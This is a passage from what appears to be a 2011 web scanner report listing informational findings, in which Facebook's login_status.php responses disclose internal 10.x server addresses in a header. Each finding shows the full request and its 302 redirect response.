GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df395d60694%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df248e1558%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df334af43f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f282070c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34571e8a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2f282070c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff25b58ee14&relation=parent&transport=postmessage&frame=f2d3362e14
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.146.37
X-Cnection: close
Date: Thu, 05 May 2011 01:29:25 GMT
Content-Length: 0

20.49. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.96.81

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2dc1db0a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113af6a38%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df121a56254%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe6e86bdc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d88f4528%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fe6e86bdc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2b359449c&relation=parent&transport=postmessage&frame=f3496b1c54
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.81
X-Cnection: close
Date: Thu, 05 May 2011 01:18:11 GMT
Content-Length: 0

20.50. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.136.127

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd112e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a6981044%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cb143fd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df170b88038%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4ed82f04%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f170b88038&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3633d694&relation=parent&transport=postmessage&frame=f196e1dc9c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.136.127
X-Cnection: close
Date: Thu, 05 May 2011 01:09:41 GMT
Content-Length: 0

20.51. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.97.53

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fa8f932c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfad2f30fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25e4f217c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ec0d1538%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e6ec71b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3ec0d1538&origin=http%3A%2F%2Faol.sportingnews.com%2Ff26b908f84&relation=parent&transport=postmessage&frame=fe0ec0478
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.97.53
X-Cnection: close
Date: Thu, 05 May 2011 01:05:43 GMT
Content-Length: 0

20.52. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.174.62

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3774ce11%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb1a975c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24f6674c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f72bf184%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d02ce5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3f72bf184&origin=http%3A%2F%2Faol.sportingnews.com%2Ff5eb44784&relation=parent&transport=postmessage&frame=f20b39a2d
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.62
X-Cnection: close
Date: Thu, 05 May 2011 01:26:27 GMT
Content-Length: 0

20.53. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.219.77

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32097f3ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df321c4c018%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc9827154%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35f5800f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcc1d454%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f35f5800f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ffba01c8c&relation=parent&transport=postmessage&frame=f14976bf7c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.219.77
X-Cnection: close
Date: Thu, 05 May 2011 01:43:09 GMT
Content-Length: 0

20.54. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.108.53

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbb817a1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f1a5aec8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2035a03e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29123c7a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa8d6ce7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f29123c7a8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2fa61ac14&relation=parent&transport=postmessage&frame=f3016c4188
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.108.53
X-Cnection: close
Date: Thu, 05 May 2011 01:18:01 GMT
Content-Length: 0

20.55. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.35

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2bf4ba5d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23f7c552c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d20f14%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff8b0928c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b3149e5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ff8b0928c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b920e7ac&relation=parent&transport=postmessage&frame=f198b979a8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.182.35
X-Cnection: close
Date: Thu, 05 May 2011 01:26:37 GMT
Content-Length: 0

20.56. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.148.107

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2614a56f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a680944%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df77e565e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3037515f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ee357ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3037515f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff984030a8&relation=parent&transport=postmessage&frame=f2d1654a5
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.148.107
X-Cnection: close
Date: Thu, 05 May 2011 02:17:50 GMT
Content-Length: 0

20.57. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.123.103

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ffd69114%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df30a17dee8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18129d944%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2874d7494%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244